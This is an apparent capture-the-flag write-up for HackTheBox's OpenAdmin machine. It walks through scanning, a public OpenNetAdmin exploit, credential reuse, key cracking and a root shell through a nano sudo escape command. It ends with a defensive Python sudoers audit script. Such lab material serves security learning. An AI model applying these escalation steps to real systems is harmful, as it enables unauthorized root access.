We always start with an nmap scan.
nmap -sC -sV -oA nmap <Target-IP>
    # Nmap 7.91 scan initiated Wed Jul 14 08:01:37 2021 as: nmap -sC -sV -oA nmap 10.10.10.171
    Nmap scan report for 10.10.10.171
    Host is up (0.40s latency).
    Not shown: 998 closed ports
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
    | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
    |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
    80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Wed Jul 14 08:02:55 2021 -- 1 IP address (1 host up) scanned in 78.33 seconds
Linux, my food, lol. So we are working on OpenAdmin on HackTheBox. We always kick off with an Nmap scan; now that we have our result, let's start enumerating. Seems we have 2 open ports.
OK, that's a default Apache page. Now let's hit gobuster to find some hidden directories.
    ┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.171]
    └─$ gobuster dir -u http://10.10.10.171 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url: http://10.10.10.171
    [+] Method: GET
    [+] Threads: 10
    [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
    [+] Negative Status codes: 404
    [+] User Agent: gobuster/3.1.0
    [+] Extensions: bak,sh,pl,cgi,zip,txt,php,html
    [+] Timeout: 10s
    ===============================================================
    2021/07/14 10:24:24 Starting gobuster in directory enumeration mode
    ===============================================================
    /index.html (Status: 200) [Size: 10918]
    /music (Status: 301) [Size: 312] [--> http://10.10.10.171/music/]
Music directory, cool. Let's navigate to it.
Going through the pages, clicking on login landed me on a new page.
Seems it is running OpenNetAdmin v18.1.1. Let's do a quick Google search; maybe it is vulnerable.
Remote Code Execution exploit, let's try it.
We have a shell, cool.
Some users in the home directory, but we have no permission; seems we need to escalate our privileges. Going through directories, in /var/www/ona/local/config I was able to get credentials in a config file.
Now let's SSH in as user jimmy with the password.
We are in. I always love checking what ports we have running locally with netstat -tulpn.
SSH Port Forwarding
ssh -L 52846:localhost:52846 email@example.com
Now let's access it in our browser.
Seems we need credentials. I tried using jimmy's creds but no luck, so back to enumerating more.
A username and a hash; let's try cracking it using online tools.
Now let's log in.
Boom, we have joanna's SSH private key. Let's crack it and hit SSH.
Now let's SSH into the machine with the private key and the password we got from it.
We are in and can run sudo on /bin/nano /opt/priv.
    sudo /bin/nano /opt/priv
    ^R^X
    reset; sh 1>&0 2>&0
We are root and done.
Greetings from Muzec
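The root step above works because the sudo rule grants an editor that can run commands from inside its own interface. As an added example (not part of the original write-up), this Python audit scans sudoers text for rules of that kind; the program list and the sample rules are constructed for illustration.

```python
import os
import re

# Programs with built-in command execution or arbitrary file access.
# Illustrative, non-exhaustive list chosen for this example.
ESCAPE_CAPABLE = {"nano", "vi", "vim", "less", "more", "man", "awk", "find",
                  "python", "python3", "perl", "bash", "sh"}

RULE = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?P<rest>.+)$")
PREFIX = re.compile(r"^(?:\([^)]*\)\s*)?(?:[A-Z_]+:\s*)*")  # (runas) and TAG: parts

def logical_lines(text):
    """Join backslash continuations; drop comments and blank lines.
    Include directives are not followed in this simplified parser."""
    for line in re.sub(r"\\\n\s*", " ", text).splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            yield line

def audit_sudoers(text):
    """Return (user, command) pairs where sudo runs an escape-capable program."""
    aliases, findings = {}, []
    for line in logical_lines(text):
        if line.startswith("Cmnd_Alias"):
            name, cmds = line[len("Cmnd_Alias"):].split("=", 1)
            aliases[name.strip()] = [c.strip() for c in cmds.split(",")]
            continue
        m = RULE.match(line)
        if line.startswith("Defaults") or not m:
            continue
        for spec in m["rest"].split(","):
            cmd = PREFIX.sub("", spec.strip(), count=1)
            for real in aliases.get(cmd, [cmd]):  # expand Cmnd_Alias names
                if real and os.path.basename(real.split()[0]) in ESCAPE_CAPABLE:
                    findings.append((m["who"], real))
    return findings

# Constructed sample sudoers content (not taken from the box in this write-up).
SAMPLE = r"""
Defaults env_reset
Cmnd_Alias EDITORS = /usr/bin/vim, \
                     /usr/bin/less
%sudo  ALL=(ALL:ALL) ALL
joanna ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
jimmy  ALL=(root) EDITORS, /usr/sbin/apache2ctl graceful
"""

if __name__ == "__main__":
    for who, cmd in audit_sudoers(SAMPLE):
        print(f"[!] {who} can run {cmd} via sudo: shell escape possible")
```

For rules meant only to let someone edit a file, sudoedit is the safer grant, since the editor then runs as the invoking user rather than as root.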